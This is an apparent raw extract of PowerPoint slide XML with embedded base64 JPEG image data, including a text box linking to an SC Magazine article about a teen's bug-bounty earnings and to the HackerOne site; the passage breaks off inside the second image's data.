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Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="597009" y="5981699"/>
            <a:ext cx="8108530" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" tIns="0" rIns="45720" bIns="0" anchor="b">
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr kumimoji="0"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2"/>
              <a:buNone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Arial"/>
              <a:buNone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1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings 2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1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial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/>
              <a:buNone/>
              <a:defRPr kumimoji="0"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ct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone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None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None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>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.scmagazine.com/home/network-security/teen-racks-up-more-than-1m-in-bug-bounties-on-hackerone-platform/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.hackerone.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l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4C9A0D-7177-A048-94AB-D7CC67C832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6400" y="1568450"/>
            <a:ext cx="4923737" cy="372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97987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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200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7" name="AutoShape 4" descr="data:image/jpeg;base64,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